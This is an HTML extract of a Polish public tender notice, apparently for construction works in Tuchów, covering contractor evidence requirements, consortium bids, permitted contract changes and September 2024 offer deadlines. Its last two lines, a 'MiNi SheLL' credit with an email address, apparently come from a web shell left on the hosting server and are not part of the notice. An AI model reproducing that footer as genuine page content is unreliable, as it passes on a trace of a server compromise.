potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe obejmują:<br/>1. Wykaz robót budowlanych wykonanych wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na<br/>rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.<br/>2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> pełnomocnictwo (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Wówczas do oferty należy dołączyć stosowne pełnomocnictwo.<br/>Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w<br/>rozdziale II pkt 3.7. SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Każdy z<br/>Wykonawców występujących wspólnie musi wykazać brak podstaw do wykluczenia. Jeżeli chociażby jeden z Wykonawców<br/>podlega wykluczeniu, to wykluczeniu podlega całe konsorcjum. 3. Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają<br/>dostawy/usługi do realizacji, dla których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt 4.6.3, wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają w<br/>formularzu ofertowym oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> I. Umowa zostanie zawarta zgodnie z projektem Umowy stanowiącym Załącznik nr 3 do SWZ. II. Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy na podstawie art. 454-455 ustawy<br/>Pzp oraz postanowień projektu umowy. 1. Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w<br/>formie pisemnej pod rygorem nieważności.<br/>2. Zamawiający zgodnie z art. 455 ust. 1 pkt 1) i pkt 4) Pzp przewiduje możliwość istotnej zmiany zawartej Umowy w<br/>stosunku do treści oferty, na podstawie której dokonano wyboru oferty, w zakresie terminów jej wykonania lub w zakresie<br/>robót, w następujących okolicznościach:<br/>1) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy – w<br/>zakresie dostosowania postanowień umowy do zmiany przepisów prawa; 2) zmiany nazwy lub formy prawnej stron – w<br/>zakresie dostosowania umowy do tych zmian;<br/>3) wystąpienia siły wyższej (Siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które<br/>zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie<br/>mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą<br/>starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) – w zakresie dostosowania umowy<br/>do zmian nią spowodowanych; 4) wystąpienie niekorzystnych warunków atmosferycznych uniemożliwiających lub znacznie<br/>utrudniających przeprowadzenie w terminie robót budowlanych – w zakresie dostosowania umowy do zmian nią<br/>spowodowanych; 5) wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można<br/>usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej<br/>interpretacji jej zapisów, w zakresie dostosowania do celu zmiany; 6) wydłużenie terminu wykonania przedmiotu umowy, o<br/>ile nie będą wynikać z przyczyn leżących po stronie Wykonawcy – w zakresie dostosowania umowy do tych zmian;<br/>7) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową,<br/>zdolnościami płatniczymi, które nie były możliwe do przewidzenia w chwili zawarcia umowy – w zakresie dostosowania<br/>umowy do zmian nią spowodowanych; 8) zmiany zastosowanych materiałów, urządzeń i technologii wykonania<br/>przedstawionych w ofercie przetargowej (roboty zamienne), pod warunkiem że zmiany te będą bardziej korzystne dla<br/>Zamawiającego i nie wpływają na prawidłowość wykonania przedmiotu zamówienia. Okoliczności, w których dopuszcza się<br/>zmiany zastosowanych materiałów, urządzeń i technologii wykonania to przykładowo:<br/>a) okoliczności powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwację<br/>wykonanego przedmiotu umowy;<br/>b) okoliczności powodujące poprawę parametrów technicznych;<br/>c) okoliczności wynikające z aktualizacji rozwiązań z uwagi na postęp techniczny, lub zmiany obowiązujących przepisów;<br/>Zmiany, o których mowa powyżej nie będą stanowić istotnej zmiany zawartej umowy i nie wymagają aneksu do umowy w<br/>sytuacji, gdy z punktu widzenia przedmiotu zamówienia mają charakter nieistotny.<br/>9) ograniczenie zakresu rzeczowego przedmiotu umowy, w sytuacji gdy wykonanie danych robót będzie zbędne do<br/>prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania<br/>przedmiotu umowy.<br/>10) wystąpienia innych przypadków wskazanych w Umowie, w szczególności konieczności wykonania robót dodatkowych<br/>lub zamiennych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy złożyć za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” – pod adresem: https://platformazakupowa.pl/pn/tuchow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-03 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-10-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com